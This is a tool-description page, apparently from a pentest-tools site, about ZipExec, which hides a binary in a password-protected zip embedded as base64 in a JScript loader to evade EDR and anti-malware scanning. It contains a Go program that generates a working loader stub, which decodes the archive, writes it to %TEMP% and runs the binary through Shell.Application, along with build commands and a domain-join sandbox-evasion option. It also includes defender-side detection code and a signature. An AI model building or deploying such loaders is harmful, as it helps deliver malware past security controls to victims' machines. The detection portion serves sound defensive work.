ZipExec is a Proof-of-Concept (POC) tool that wraps a binary-based tool into a password-protected zip file. The zip file is base64-encoded into a string, and that string is embedded in a generated JScript loader. When the loader runs, it rebuilds the password-protected zip on disk and executes the binary from inside it. This is done programmatically: the JScript uses COM objects to drive the same GUI functions Windows Explorer exposes for zip folders, so the binary is launched from the password-protected archive without the operator having to unzip it first. Password-protecting the zip keeps the embedded binary from being inspected by EDRs and other disk-based or anti-malware scanning mechanisms that cannot open the encrypted entries. Note that the shell still has to extract the binary to a temporary location at execution time, so this hides the payload from scanning of the archive and the loader, not from scanning of the extracted copy or the running process.
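The following Go program is an added example written for this page, not ZipExec's own code. It shows the two halves of the pipeline described above from both sides: the generator side (zip a file, base64 it, embed the blob in a JScript stub that decodes it with MSXML2.DOMDocument, writes it with ADODB.Stream and asks Shell.Application to open the first item in the archive) and the defender side (pull the base64 literal back out of the loader without executing it, and read bit 0 of the zip local file header's general-purpose flags, which marks a password-protected entry even when the password is unknown). Assumptions: it uses only the standard library, so the password protection ZipExec gets from github.com/yeka/zip is omitted and the example archive is unencrypted; the loader template, the `ZIP_B64` variable name and the file names are illustrative and are not ZipExec's template.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// BuildZip wraps a single file into an in-memory zip archive with the standard
// library. ASSUMPTION: the password protection that ZipExec gets from
// github.com/yeka/zip is omitted here, so this archive is NOT encrypted.
func BuildZip(name string, data []byte) ([]byte, error) {
	var buf bytes.Buffer
	w := zip.NewWriter(&buf)
	f, err := w.Create(name)
	if err != nil {
		return nil, err
	}
	if _, err := f.Write(data); err != nil {
		return nil, err
	}
	if err := w.Close(); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

// blobMarker is the JScript variable that carries the base64 archive (illustrative name).
const blobMarker = "ZIP_B64"

// RenderLoader embeds the zip as base64 inside a JScript stub. The stub decodes
// the blob with MSXML2.DOMDocument, writes it to %TEMP% with ADODB.Stream and
// asks the Explorer shell (Shell.Application) to open the first item inside
// the archive. ASSUMPTION: this is a sketch of the loader shape, not ZipExec's
// own template; it is only meaningful under Windows Script Host.
func RenderLoader(zipBytes []byte, zipName string) string {
	b64 := base64.StdEncoding.EncodeToString(zipBytes)
	var sb strings.Builder
	sb.WriteString("var " + blobMarker + " = \"" + b64 + "\";\n")
	sb.WriteString(`var xml = new ActiveXObject("MSXML2.DOMDocument");
var node = xml.createElement("b64");
node.dataType = "bin.base64";
node.text = ` + blobMarker + `;
var stm = new ActiveXObject("ADODB.Stream");
stm.Type = 1; stm.Open(); stm.Write(node.nodeTypedValue);
var path = new ActiveXObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") + "\\` + zipName + `";
stm.SaveToFile(path, 2); stm.Close();
var shell = new ActiveXObject("Shell.Application");
shell.NameSpace(path).Items().Item(0).InvokeVerb("open");
`)
	return sb.String()
}

var blobRe = regexp.MustCompile(`var ` + blobMarker + ` = "([A-Za-z0-9+/=]+)";`)

// ExtractBlob recovers the zip bytes from a loader the way a scanner would:
// locate the base64 literal and decode it, no script execution required.
func ExtractBlob(loader string) ([]byte, error) {
	m := blobRe.FindStringSubmatch(loader)
	if m == nil {
		return nil, errors.New("no base64 blob found in loader")
	}
	return base64.StdEncoding.DecodeString(m[1])
}

// ZipIsEncrypted inspects the first local file header (signature 0x04034b50):
// bit 0 of the general-purpose flag field at offset 6 marks a password-protected
// entry. A scanner can read this flag without knowing the password.
func ZipIsEncrypted(zipBytes []byte) (bool, error) {
	if len(zipBytes) < 30 || binary.LittleEndian.Uint32(zipBytes[0:4]) != 0x04034b50 {
		return false, errors.New("not a zip local file header")
	}
	flags := binary.LittleEndian.Uint16(zipBytes[6:8])
	return flags&0x0001 != 0, nil
}

func main() {
	// Constructed sample payload; not a real executable.
	z, err := BuildZip("payload.exe", []byte("MZ constructed sample payload"))
	if err != nil {
		panic(err)
	}
	loader := RenderLoader(z, "loader.zip")
	blob, _ := ExtractBlob(loader)
	enc, _ := ZipIsEncrypted(blob)
	fmt.Printf("loader %d bytes, recovered zip %d bytes, encrypted=%v\n", len(loader), len(blob), enc)
}
```

The defender-side functions are the useful part for detection engineering: a JScript file containing a large base64 literal that decodes to a `PK\x03\x04` header with the encryption bit set, next to `ActiveXObject("Shell.Application")`, is a compact signature for this loader pattern regardless of what the archive contains.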
The first step, as always, is to clone the repo. Before you compile ZipExec you will need to install its dependency. To install it, run the following command:
go get github.com/yeka/zip
Then build it:
go get github.com/Tylous/ZipExec
Help
Usage of ./ZipExec:
  Path to the file containing the binary to zip.
  Name of the output file (e.g. loader.js)
  Enables sandbox evasion using IsDomainedJoined (the loader checks whether the host is domain-joined before running).
Source: KitPloit – PenTest Tools!